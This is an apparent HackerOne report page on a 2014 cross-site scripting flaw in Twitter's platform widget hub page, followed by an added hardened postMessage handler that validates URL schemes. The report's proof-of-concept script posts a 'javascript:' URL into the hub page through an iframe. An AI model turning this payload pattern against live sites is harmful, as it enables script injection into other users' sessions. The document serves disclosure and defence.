Twitter: XSS platform.twitter.com

2014-09-28T18:18:12
ID H1:29328
Type hackerone
Reporter batram
Modified 2014-11-17T14:30:52

Description

Since you have fixed a few problems with the FlashTransport on platform.twitter.com already, I thought I would also take a look at the JavaScript around it.

Problem URL: https://platform.twitter.com/widgets/hub.html

Description: The mentioned page opens URLs sent to it via postMessage or FlashTransport without checking for a 'javascript:' prefix, resulting in XSS on platform.twitter.com. Since the URL gets opened in a popup, popups need to be allowed or the opening must be a result of user interaction.

PoC:

<iframe src="https://platform.twitter.com/widgets/hub.html" id="iframe"></iframe>

<script>
  // Window object of the embedded hub page that receives the RPC messages.
  var win = document.getElementById("iframe").contentWindow;

  // Send the "openIntent" RPC with a javascript: URL as the only parameter;
  // hub.html passes it to a popup without checking the scheme.
  function fire() {
    win.postMessage(
      '{"id": 12, "method": "openIntent", "params":["javascript:alert(document.domain)"]}',
      "https://platform.twitter.com/"
    );
  }

  // Wait for the hub page to announce it is ready before sending the message.
  function listener(e) {
    console.log(e.data);
    if (e.data == '__ready__')
      fire();
  }

  // Register the message listener (attachEvent fallback for old IE).
  if (window.addEventListener) {
    addEventListener("message", listener, false);
  } else {
    attachEvent("onmessage", listener);
  }
</script>

Tested in: Win 8.1 | Google Chrome | Version 39.0.2166.2 dev-m (64-bit)
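The report's core point is that hub.html handed a postMessage-supplied URL to a popup without validating its scheme. The following is an added example, not Twitter's hub.html code and not part of the report: a hardened handler for an "openIntent"-style RPC, modelled on the message shape in the PoC. It checks the sender origin against an allowlist, parses the envelope defensively, and accepts only http/https URLs via the WHATWG URL parser, so case and whitespace variants of "javascript:" are normalised and rejected along with data: and other non-web schemes. The origin list, the host allowlist (twitter.com) and the names ALLOWED_ORIGINS, safeIntentUrl and handleHubMessage are all assumptions; the real handler's structure is not on the page.

```javascript
// Added example (not Twitter's hub.html code): a hardened postMessage handler
// for an "openIntent"-style RPC that refuses javascript: and other non-web
// schemes before a URL reaches window.open. The handler shape, origin list
// and host list are assumptions modelled on the PoC message in the report.

// Origins from which the hub accepts RPC messages. Hypothetical sample value.
const ALLOWED_ORIGINS = new Set([
  "https://example-embedder.test",   // constructed sample embedder origin
]);

// A denylist of the literal string "javascript:" is fragile (case, leading
// whitespace, data:/vbscript: slip through), so allow a fixed set of schemes.
const ALLOWED_PROTOCOLS = new Set(["https:", "http:"]);

// Host allowlist; an assumption, since the report does not say which hosts
// the intent page was meant to open.
const ALLOWED_HOSTS = new Set(["twitter.com"]);

// Returns the normalised URL string if it is safe to open, otherwise null.
function safeIntentUrl(raw) {
  if (typeof raw !== "string") return null;
  let url;
  try {
    // WHATWG parser: absolute URLs only; relative strings and garbage throw.
    url = new URL(raw);
  } catch (e) {
    return null;
  }
  // The parser lowercases the scheme and strips surrounding whitespace, so
  // "  JavaScript:alert(1)" normalises to protocol "javascript:" and fails here.
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

// Processes one message event. `open` is injected so the logic runs without
// a browser; the real page would pass window.open. Returns a result object.
function handleHubMessage(event, open) {
  // 1. Accept messages only from known embedders; never use "*" here.
  if (!ALLOWED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: "origin" };
  }
  // 2. Parse the RPC envelope defensively.
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { ok: false, reason: "json" };
  }
  if (!msg || msg.method !== "openIntent" || !Array.isArray(msg.params)) {
    return { ok: false, reason: "method" };
  }
  // 3. Validate the URL before it reaches window.open.
  const target = safeIntentUrl(msg.params[0]);
  if (target === null) {
    return { ok: false, reason: "url" };
  }
  // "noopener" keeps the popup from holding a reference back to the hub page.
  open(target, "_blank", "noopener");
  return { ok: true, url: target };
}

// Constructed sample messages exercising the handler offline.
function demo() {
  const opened = [];
  const fakeOpen = (u) => opened.push(u);
  const from = (origin, data) => ({ origin, data });
  const embedder = "https://example-embedder.test";

  const results = [
    // The report's payload shape: rejected on the URL check.
    handleHubMessage(from(embedder,
      '{"id":12,"method":"openIntent","params":["javascript:alert(document.domain)"]}'), fakeOpen),
    // Case/whitespace variant: normalised by the parser and still rejected.
    handleHubMessage(from(embedder,
      '{"id":13,"method":"openIntent","params":["  JavaScript:alert(1)"]}'), fakeOpen),
    // Another non-web scheme: rejected as well.
    handleHubMessage(from(embedder,
      '{"id":14,"method":"openIntent","params":["data:text/html,hi"]}'), fakeOpen),
    // A legitimate intent URL: opened.
    handleHubMessage(from(embedder,
      '{"id":15,"method":"openIntent","params":["https://twitter.com/intent/tweet?text=hi"]}'), fakeOpen),
    // Right URL, unknown origin: dropped before parsing.
    handleHubMessage(from("https://unknown.test",
      '{"id":16,"method":"openIntent","params":["https://twitter.com/intent/tweet"]}'), fakeOpen),
  ];
  return { results, opened };
}
```

Parsing with the URL constructor rather than string-prefix matching is the design choice that matters: the scheme check runs on the parser's canonical form, which is what the browser will act on, so the validator and window.open cannot disagree about what the string means.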